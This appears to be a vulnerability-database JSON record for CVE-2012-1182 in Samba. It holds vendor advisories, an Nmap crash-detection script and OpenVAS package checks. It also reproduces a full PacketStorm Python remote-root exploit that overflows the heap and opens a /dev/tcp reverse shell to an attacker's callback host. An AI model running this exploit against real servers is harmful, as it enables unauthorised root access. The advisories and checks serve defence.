msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)\n if(status == false) then\n msrpc.stop_smb(smbstate)\n return false, bind_result\n end\n\n -- create malicious packet, same as in the PoC\n local data = string.pack(\"<I4\",4096) -- num_sids\n .. \"abcd\"\n ..string.pack(\"<I4I4I4\",100\n ,0\n ,100)\n ..string.rep(\"a\",1000)\n\n local marshaledHandle = string.rep(\"X\",20)\n status, result = msrpc.samr_getaliasmembership(smbstate,marshaledHandle, data)\n stdnse.debug2(\"msrpc.samr_getaliasmembership: %s, '%s'\", status, result)\n if(status == false and string.find(result,\"Failed to receive bytes after 5 attempts\") ~= nil) then\n samba_cve.state = vulns.STATE.VULN -- connection dropped, server crashed\n end\n\n return report:make_output(samba_cve)\n\nend\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:53:36", "description": "CVE ID: CVE-2012-1182\r\n\r\nSamba\u662f\u4e00\u5957\u5b9e\u73b0SMB\uff08Server Messages Block\uff09\u534f\u8bae\u3001\u8de8\u5e73\u53f0\u8fdb\u884c\u6587\u4ef6\u5171\u4eab\u548c\u6253\u5370\u5171\u4eab\u670d\u52a1\u7684\u7a0b\u5e8f\u3002\r\n\r\nSamba 3.6.3\u4e4b\u524d\u7248\u672c\u7684RPC\u4ee3\u7801\u751f\u6210\u5668\u5b58\u5728\u9519\u8bef\uff0c\u5bfc\u81f4\u751f\u6210\u7684\u4ee3\u7801\u4e2d\u5305\u542b\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fd9\u4e9b\u751f\u6210\u7684\u4ee3\u7801\u7528\u5728Samba\u63a7\u5236RPC\u7f51\u7edc\u6570\u636e\u5904\u7406\u7684\u90e8\u5206\u3002\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u7279\u5236\u7684RPC\u8c03\u7528\u65e0\u9700\u7528\u6237\u9a8c\u8bc1\u9020\u6210\u670d\u52a1\u5668\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nSamba < 3.6.3\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSamba\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.samba.org/", "published": "2012-04-12T00:00:00", "type": "seebug", "title": "Samba < 3.6.3 \u7248\u672cndr_pull_lsa_SidArray\u5806\u6ea2\u51fa\u6f0f\u6d1e(CVE-2012-1182)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60050", "id": "SSV:60050", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "description": "No description provided", "edition": 1, "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:VULN:12426", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12426", "title": "HP Server Automation code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-1182"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03366886\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03366886\r\nVersion: 1\r\n\r\nHPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of\r\nArbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2012-06-11\r\nLast Updated: 2012-06-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Server\r\nAutomation for Linux and SunOS. This vulnerability could by exploited\r\nremotely resulting in the execution of arbitrary code. The vulnerability is\r\nin Samba which is used in HP Server Automation.\r\n\r\nReferences: CVE-2012-1182\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Server Automation v7.8x, v9.0x, v9.1x on RedHat Linux, Suse Linux, and\r\nSunOS\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2012-1182 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided HP Server Automation Patch SRVA_00127.tar.gz to resolve this\r\nissue. The patch is available on HP's SSO here:\r\nhttp://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_SRVA_00127\r\n\r\nHISTORY\r\nVersion:1 (rev.1) 11 June 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk/V+3oACgkQ4B86/C0qfVnNIwCdHLlLQQANRVn3NY7HPMQvo5Y0\r\n3AgAoI1Jvj4NXs1QOB0oshhDlFuDsizm\r\n=3sLX\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-17T00:00:00", "published": "2012-06-17T00:00:00", "id": "SECURITYVULNS:DOC:28165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28165", "title": "[security bulletin] HPSBMU02790 SSRT100872 rev.1 - HP Server Automation, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:15:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bug has been fixed:\n\n * mount.cifs: Properly update mtab during remount;\n (bnc#747906).\n", "edition": 1, "modified": "2012-04-14T14:08:17", "published": "2012-04-14T14:08:17", "id": "SUSE-SU-2012:0504-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00009.html", "title": "Security update for Samba (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:06", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bugs have been fixed:\n\n * Samba printer name marshalling problems (bnc#722663)\n * mount.cifs: properly update mtab during remount\n (bnc#747906)\n * s3: compile IDL files in autogen, some configure\n tests need this.\n * Fix incorrect types in the full audit VFS module. Add\n null terminators to audit log enums (bnc#742885)\n * Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631); (bnc#732572).\n", "edition": 1, "modified": "2012-04-14T10:08:18", "published": "2012-04-14T10:08:18", "id": "SUSE-SU-2012:0500-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00006.html", "type": "suse", "title": "Security update for Samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "edition": 1, "modified": "2012-04-14T10:08:19", "published": "2012-04-14T10:08:19", "id": "SUSE-SU-2012:0501-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00007.html", "type": "suse", "title": "Security update for Samba (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:46", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "edition": 1, "modified": "2012-04-14T14:08:19", "published": "2012-04-14T14:08:19", "id": "SUSE-SU-2012:0501-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00010.html", "title": "Security update for Samba (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:26", "description": "", "published": "2012-09-25T00:00:00", "type": "packetstorm", "title": "Samba 3.x Remote Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2012-09-25T00:00:00", "id": "PACKETSTORM:116843", "href": "https://packetstormsecurity.com/files/116843/Samba-3.x-Remote-Root.html", "sourceData": "`#!/usr/bin/python \n# \n# finding targets 4 31337z: \n# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1' \n# -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell \n# found by eax samba 0day godz (loljk) \n \n \nfrom binascii import hexlify, unhexlify \nimport socket \nimport threading \nimport SocketServer \nimport sys \nimport os \nimport time \nimport struct \n \ntargets = [ \n{ \n\"name\" : \"samba_3.6.3-debian6\", \n\"chunk_offset\" : 0x9148, \n\"system_libc_offset\" : 0xb6d003c0 \n}, \n{ \n\"name\" : \"samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)\", \n\"chunk_offset\" : 4560, \n\"system_libc_offset\" : 0xb20 \n}, \n{ \n\"name\" : \"target_finder (hardcode correct system addr)\", \n\"chunk_offset\" : 0, \n\"system_libc_offset\" : 0xb6d1a3c0, \n\"finder\": True \n} \n] \n \ndo_brute = True \nrs = 1024 \nFILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) \n \ndef dump(src, length=32): \nresult=[] \nfor i in xrange(0, len(src), length): \ns = src[i:i+length] \nhexa = ' '.join([\"%02x\"%ord(x) for x in s]) \nprintable = s.translate(FILTER) \nresult.append(\"%04x %-*s %s\\n\" % (i, length*3, hexa, printable)) \nreturn ''.join(result) \n \n \nsploitshake = [ \n# HELLO \n\"8100004420434b4644454e4543464445\" + \\ \n\"46464346474546464343414341434143\" + \\ \n\"41434143410020454745424644464545\" + \\ \n\"43455046494341434143414341434143\" + \\ \n\"4143414341414100\", \n \n# NTLM_NEGOT \n\"0000002fff534d427200000000000000\" + \\ \n\"00000000000000000000000000001d14\" + \\ \n\"00000000000c00024e54204c4d20302e\" + \\ \n\"313200\", \n \n# SESSION_SETUP \n\"0000004bff534d427300000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"000000000dff000000ffff02001d1499\" + \\ \n\"1f00000000000000000000010000000e\" + \\ \n\"000000706f736978007079736d6200\", \n \n# TREE_CONNECT \n\"00000044ff534d427500000000080000\" + \\ \n\"000000000000000000000000ffff1d14\" + \\ \n\"6400000004ff00000000000100190000\" + \\ \n\"5c5c2a534d425345525645525c495043\" + \\ \n\"24003f3f3f3f3f00\", \n \n# NT_CREATE \n\"00000059ff534d42a200000000180100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000018ff00000000050016000000\" + \\ \n\"000000009f0102000000000000000000\" + \\ \n\"00000000030000000100000040000000\" + \\ \n\"020000000306005c73616d7200\" \n] \n \npwnsauce = { \n'smb_bind': \\ \n\"00000092ff534d422500000000000100\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"6400000010000048000004e0ff000000\" + \\ \n\"0000000000000000004a0048004a0002\" + \\ \n\"002600babe4f005c504950455c000500\" + \\ \n\"0b03100000004800000001000000b810\" + \\ \n\"b8100000000001000000000001007857\" + \\ \n\"34123412cdabef000123456789ab0000\" + \\ \n\"0000045d888aeb1cc9119fe808002b10\" + \\ \n\"486002000000\", \n \n'data_chunk': \\ \n\"000010efff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"0000000800b0100000b0103f00000000\" + \\ \n\"00b0100500000110000000b010000001\" + \\ \n\"0000009810000000000800\", \n \n'final_chunk': \\ \n\"000009a3ff534d422f00000000180000\" + \\ \n\"00000000000000000000000001001d14\" + \\ \n\"640000000eff000000babe00000000ff\" + \\ \n\"00000008006409000064093f00000000\" + \\ \n\"00640905000002100000006409000001\" + \\ \n\"0000004c09000000000800\" \n} \n \n \ndef exploit(host, port, cbhost, cbport, target): \nglobal sploitshake, pwnsauce \n \nchunk_size = 4248 \n \ntarget_tcp = (host, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target_tcp) \n \nn = 0 \nfor pkt in sploitshake: \ns.send(unhexlify(pkt)) \npkt_res = s.recv(rs) \nn = n+1 \n \nfid = hexlify(pkt_res[0x2a] + pkt_res[0x2b]) \n \ns.send(unhexlify(pwnsauce['smb_bind'].replace(\"babe\", fid))) \npkt_res = s.recv(rs) \n \nbuf = \"X\"*20 # policy handle \nlevel = 2 #LSA_POLICY_INFO_AUDIT_EVENTS \nbuf+=struct.pack('<H',level) # level \nbuf+=struct.pack('<H',level)# level2 \nbuf+=struct.pack('<L',1)#auditing_mode \nbuf+=struct.pack('<L',1)#ptr \nbuf+=struct.pack('<L',100000) # r->count \nbuf+=struct.pack('<L',20) # array_size \nbuf+=struct.pack('<L',0) \nbuf+=struct.pack('<L',100) \n \nbuf += (\"A\" * target['chunk_offset']) \n \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0xe8150c70); \nbuf+=\"AAAABBBB\" \n \ncmd = \";;;;/bin/bash -c '/bin/bash 0</dev/tcp/\"+cbhost+\"/\"+cbport+\" 1>&0 2>&0' &\\x00\" \n \ntmp = cmd*(816/len(cmd)) \ntmp += \"\\x00\"*(816-len(tmp)) \n \nbuf+=tmp \nbuf+=\"A\"*(37192-target['chunk_offset']) \nbuf+='z'*(100000 - (28000 + 10000)) \n \nbuf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] \nn=0 \n \nfor chunk in buf_chunks: \nif len(chunk) != chunk_size: \n#print \"LAST CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['final_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nelse: \n#print \"CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['data_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nretbuf = s.recv(rs) \nn=n+1 \n \ns.close() \n \nclass connectback_shell(SocketServer.BaseRequestHandler): \ndef handle(self): \nglobal do_brute \n \nprint \"\\n[!] connectback shell from %s\" % self.client_address[0] \ndo_brute = False \n \ns = self.request \n \nimport termios, tty, select, os \nold_settings = termios.tcgetattr(0) \ntry: \ntty.setcbreak(0) \nc = True \nwhile c: \nfor i in select.select([0, s.fileno()], [], [], 0)[0]: \nc = os.read(i, 1024) \nif c: \nif i == 0: \nos.write(1, c) \n \nos.write(s.fileno() if i == 0 else 1, c) \nexcept KeyboardInterrupt: pass \nfinally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) \n \nreturn \n \n \nclass ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): \npass \n \n \nif len(sys.argv) != 6: \nprint \"\\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\\n\" \nprint \" usage: %s <targethost> <targetport> <myip> <myport> <target>\\n\" % (sys.argv[0]) \nprint \" targets:\" \ni = 0 \nfor target in targets: \nprint \" %02d) %s\" % (i, target['name']) \ni = i+1 \n \nprint \"\" \nsys.exit(-1) \n \n \ntarget = targets[int(sys.argv[5])] \n \nserver = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) \nserver_thread = threading.Thread(target=server.serve_forever) \nserver_thread.daemon = True \nserver_thread.start() \n \nwhile do_brute == True: \nsys.stdout.write(\"\\r{+} TRYING EIP=\\x1b[31m0x%08x\\x1b[0m OFFSET=\\x1b[32m0x%08x\\x1b[0m\" % (target['system_libc_offset'], target['chunk_offset'])) \nsys.stdout.flush() \nexploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) \n \nif \"finder\" in target: \ntarget['chunk_offset'] += 4 \nelse: \ntarget['system_libc_offset'] += 0x1000 \n \n \nif \"finder\" in target: \nprint \\ \n\"{!} found \\x1b[32mNEW\\x1b[0m target: chunk_offset = ~%d, \" \\ \n\"system_libc_offset = 0x%03x\" % \\ \n(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) \n \nwhile 1: \ntime.sleep(999) \n \nserver.shutdown() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/116843/samba3-exec.txt"}], "openvas": [{"lastseen": "2019-05-29T18:36:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Oracle Linux Local Security Checks ELSA-2012-0466", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123943", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0466", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0466.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123943\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:38 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0466\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0466 - samba3x security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0466\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0466.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:10:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of openchange", "modified": "2018-01-23T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:870928", "href": "http://plugins.openvas.org/nasl.php?oid=870928", "type": "openvas", "title": "RedHat Update for openchange RHSA-2013:0515-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_id(870928);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openchange\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 